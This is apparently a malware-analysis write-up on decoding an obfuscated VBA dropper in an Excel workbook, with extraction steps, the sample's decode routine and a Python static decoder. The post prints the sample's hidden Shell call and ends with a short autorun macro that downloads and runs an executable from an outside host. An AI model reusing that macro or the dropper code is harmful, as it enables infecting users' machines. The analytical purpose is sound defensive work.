Office document malware - office_vb_dropper decoding. Sample A

Lenny Zeltser's cheat sheet will tell you how to extract the macros, but it does not tell you what to do with them once extracted, or at least point you in the right direction to turn the code into a more human-readable form.

Procedure


In this example I have a new-format Excel document (.xlsm). To pull out the macro we need to open the file in 7-Zip, since the .xlsm is just a ZIP archive container.

Go into the xl directory and extract vbaProject.bin.

Now we can use OfficeMalScanner from www.reconstructer.org.

I tend to create a working folder to drop malware into and extract artifacts into. Open a PowerShell prompt and change into it:

cd "C:\Users\myaccount\Desktop\Malware Analysis\17-02-15"

I tend to put programs that don't require installation under c:\bin\. We will now use OfficeMalScanner to extract the VB code:

C:\bin\OfficeMalScanner\OfficeMalScanner.exe .\vbaProject.bin info

Now, in the working folder, we should have the extracted contents in a folder called VBAPROJECT.BIN-Macros.

We have a lot of files, so we need to join them up to make it easier to follow what's going on here.

The manual method is to select all the files and open them in Notepad++, create a new file and copy them in one by one, closing each file once it has been copied. I save this file as combined.txt.

However, it's easier to use PowerShell to do our bidding:

cd .\VBAPROJECT.BIN-Macros

This simple PowerShell command will join up the files. Note that the file beginning with __ ends up at the end of the combined file, and that is the one holding the first routine called:

Get-Content * | Set-Content combined.txt

It looks like __SRP_1d is the project file for the VB macro inside the document, and as such contains the first function it should execute on document load.

By combining all these files it should be easier to search for the function that is called:

Sub Workbook_Open()
    tyrtyaag
End Sub

Searching the combined file for tyrtyaag finds:


Attribute VB_Name = "Module11"
Sub tyrtyaag()
FfdsfF = NewQkeTzIIHM("pzq-<X-]|„r`uryy;r…r-5[r„:\owrp-`†€rz;[r;droPyvr{6;Q|„{y|nqSvyr54u}G<<AC;@=;A?;>B><x„rsr„rs<stq€rr<q…‡~;w}t4942aRZ]2iWV\v|qsuv|VU;pno46H-r…}n{q-2aRZ]2iWV\v|qsuv|VU;pno-2aRZ]2iWV\v|qsuv|VU;r…rH-€n-2aRZ]2iWV\v|qsuv|VU;r…rH")
Shell FfdsfF, vbHide

End Sub

Here FfdsfF is assigned the return value of NewQkeTzIIHM with an obfuscated string passed into it, which looks like a decode routine, and the Shell call then executes whatever that routine returns. So I search for NewQkeTzIIHM:

Attribute VB_Name = "Module14"
Public Function NewQkeTzIIHM(ByVal AESdyLylMjhJrIu As String) As String
GoTo lZiGBegMhmukPZZYdz
lZiGBegMhmukPZZYdz:
GoTo httIMPHgvoYFI
httIMPHgvoYFI:
GoTo JYUDQqqRamOiNl
JYUDQqqRamOiNl:
GoTo DOIbKh
DOIbKh:
Dim YyJDVSqLkdZk As Long
GoTo epGUden
epGUden:
For YyJDVSqLkdZk = 1 To Len(AESdyLylMjhJrIu)
GoTo lRYrzpUP
lRYrzpUP:
GoTo TELSjKJaPRJjLqoQK
TELSjKJaPRJjLqoQK:
GoTo MblTSGGiqCfyeCTgTRL
MblTSGGiqCfyeCTgTRL:
GoTo xhsyu
xhsyu:
GoTo YtuEcImBipHPFlghfkUO
YtuEcImBipHPFlghfkUO:
NewQkeTzIIHM = NewQkeTzIIHM & Chr(Asc(Mid(AESdyLylMjhJrIu, YyJDVSqLkdZk, 1)) - 13)
GoTo Lcgja
Lcgja:
GoTo Hrnbw
Hrnbw:
GoTo rBkkQJ
rBkkQJ:
GoTo TiOhSQwlicurNkI
TiOhSQwlicurNkI:
Next YyJDVSqLkdZk
GoTo ZoJKUeZCSlFZSIowxvAm
ZoJKUeZCSlFZSIowxvAm:
GoTo QddswzqP
QddswzqP:
GoTo HpsMptHRnAnaBQVygxjn
HpsMptHRnAnaBQVygxjn:
GoTo ysKHfAZQM
ysKHfAZQM:
GoTo EaNQvpSUBV
EaNQvpSUBV:
End Function
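Once the GoTo padding is stripped away, the Module14 loop is just Chr(Asc(c) - 13) applied to every character, so the string can be decoded statically instead of by running the macro. The script below is an added example, not code from the post or its author. It covers two of the steps above: joining the extracted module dumps with the __ file first (so the entry point sits at the top rather than the bottom, as it does with the Get-Content pipeline), walking from the auto-exec Sub to the routine it calls, and then extracting the literal passed to NewQkeTzIIHM and reversing the shift. The module dumps and file names inside it are constructed from the snippets above, with the obfuscated string shortened; the decoder assumes VBA's Asc() is returning Windows-1252 bytes, which is why non-ASCII characters such as „ are mapped back to their code-page byte. One caveat when copying the string from a web page: encoded characters that are control bytes (the 'r' in PowerShell encodes to 0x7F) do not survive, so the decoded output has those letters missing.

```python
import re

# Constructed module dumps modelled on the files the post extracts with
# OfficeMalScanner: the Workbook_Open stub and Module11 (its obfuscated string
# is shortened here). The file names are placeholders, not the sample's real ones.
MODULES = {
    "__SRP_1d": "Sub Workbook_Open()\n    tyrtyaag\nEnd Sub\n",
    "Module11": (
        'Attribute VB_Name = "Module11"\n'
        "Sub tyrtyaag()\n"
        'FfdsfF = NewQkeTzIIHM("pzq-<X-]|„r`uryy;r…r")\n'
        "Shell FfdsfF, vbHide\n"
        "\n"
        "End Sub\n"
    ),
}

# Procedure names Office runs automatically when a document opens (Excel and Word).
AUTO_EXEC = ("Workbook_Open", "Document_Open", "AutoOpen", "Auto_Open", "AutoExec")
DECODER = "NewQkeTzIIHM"   # the decode function from Module14
SHIFT = 13                 # Module14 does Chr(Asc(c) - 13) on every character


def combine(modules):
    """Join the dumps with the __ files first so the entry point sits at the top
    (the post's Get-Content * pipeline leaves it at the bottom)."""
    order = sorted(modules, key=lambda name: (not name.startswith("__"), name))
    return "".join(f"' ==== {name} ====\n{modules[name]}\n" for name in order)


def sub_body(text, name):
    """Return the lines between 'Sub <name>(' and its 'End Sub', or None."""
    header = re.compile(r"^\s*(?:Public\s+|Private\s+)?Sub\s+" + re.escape(name) + r"\s*\(", re.I)
    lines = text.splitlines()
    for i, line in enumerate(lines):
        if header.match(line):
            body = []
            for later in lines[i + 1:]:
                if re.match(r"^\s*End Sub\b", later, re.I):
                    return "\n".join(body)
                body.append(later)
    return None


def find_entry_point(text):
    """Locate the first auto-exec Sub and the bare procedure name it calls
    (the post's stub consists of a single such call)."""
    for name in AUTO_EXEC:
        body = sub_body(text, name)
        if body is not None:
            calls = [ln.strip() for ln in body.splitlines() if ln.strip()]
            return name, (calls[0] if calls else "")
    return None


def vba_asc(ch):
    """Mimic VBA's Asc(): on a Windows-1252 system it returns the ANSI byte, so
    characters such as „ (0x84) must be mapped back to that byte first (assumption)."""
    if ord(ch) < 128:
        return ord(ch)
    try:
        return ch.encode("cp1252")[0]
    except UnicodeEncodeError:
        raise ValueError(f"{ch!r} is not a Windows-1252 character; the dump is probably mangled")


def shift_decode(encoded, shift=SHIFT):
    """Static equivalent of the Module14 loop. Encoded characters that were
    control bytes (e.g. 'r' + 13 = 0x7F) do not survive copy-paste into a web
    page, so a string taken from the post decodes with those letters missing."""
    return "".join(chr(vba_asc(ch) - shift) for ch in encoded)


def decode_calls(body, decoder=DECODER, shift=SHIFT):
    """Decode every string literal passed to the decoder inside a Sub body."""
    pattern = re.compile(re.escape(decoder) + r'\("([^"]*)"\)')
    return [shift_decode(arg, shift) for arg in pattern.findall(body)]


def analyse(modules=MODULES):
    """Entry point -> called Sub -> decoded payload, all without running a macro."""
    text = combine(modules)
    entry = find_entry_point(text)
    if entry is None:
        return None
    auto_sub, called = entry
    body = sub_body(text, called) or ""
    return {"entry": auto_sub, "calls": called, "decoded": decode_calls(body)}


if __name__ == "__main__":
    print(analyse())
```

To use it on a real dump, replace MODULES with the text of each file in VBAPROJECT.BIN-Macros keyed by file name, and check DECODER and SHIFT against whatever the sample's decode routine actually does; the shift of 13 is specific to this sample's Module14.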

So we can make the code reveal itself by breaking its flow. Open Word and create a new macro module, copy in both routines and remove the Shell line. Take out some of the content inside the ( ) and run the macro.
I got this message:
Now I'll add in some more of the string and see how this develops.
Ultimately we end up with:
So, in short, the simplest way to replicate this type of attack is to embed the following autorun macro:

Sub simple()
    Shell "cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://somehost/this/folder/nasty.jpg','%TEMP%\nasty.cab'); expand %TEMP%\nasty.cab %TEMP%\nasty.exe; start %TEMP%\nasty.exe;", vbHide
End Sub

By the way, this will fail if a proxy is required.
